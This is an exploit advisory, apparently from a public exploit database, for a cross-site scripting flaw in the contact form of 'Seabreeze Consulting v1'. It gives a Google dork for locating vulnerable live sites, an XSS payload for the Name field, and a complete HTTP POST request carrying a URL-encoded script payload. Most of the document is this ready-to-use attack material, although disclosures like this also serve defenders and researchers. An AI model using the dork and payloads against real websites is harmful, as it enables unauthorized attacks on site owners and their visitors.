Seabreeze Consulting version 1 suffers from a cross site scripting vulnerability.
36c7eacfcff90917b068e6bab6c2f2ca
# Exploit Title: Seabreezeconsulting v1 XSS vulnerability
# Google Dork:"by Seabreeze Consulting" +inurl:/contact.php
# Date: 2020-04-03
# Exploit Author: @ThelastVvV
# Vendor Homepage: www.seabreezeconsulting.com
# Version: 1
# Tested on: 5.4.0-4parrot1-amd6
---------------------------------------------------------
PoC 1 :
XSS Vulnerability
Payload(s) :
In the "Name"-box use payload:
"><img src=x onerror=prompt(document.domain);>
www.anysite.com/contact.php
------------
POST https://www.example.com/contact.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 286
Referer: https://www.example.com/contact.php
Host: www.example.com
name=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&businessname=VVV&address=VVV&citytown=VVV&phone=VVV&email=VVV&services%5B0%5D=Web+Design&services%5B1%5D=Hosting&services%5B2%5D=Domain+Registration¤tdomain=VVV&desireddomain=VVV&comments=&accept=yes&code=VVV&contactbtn=Submit
-----------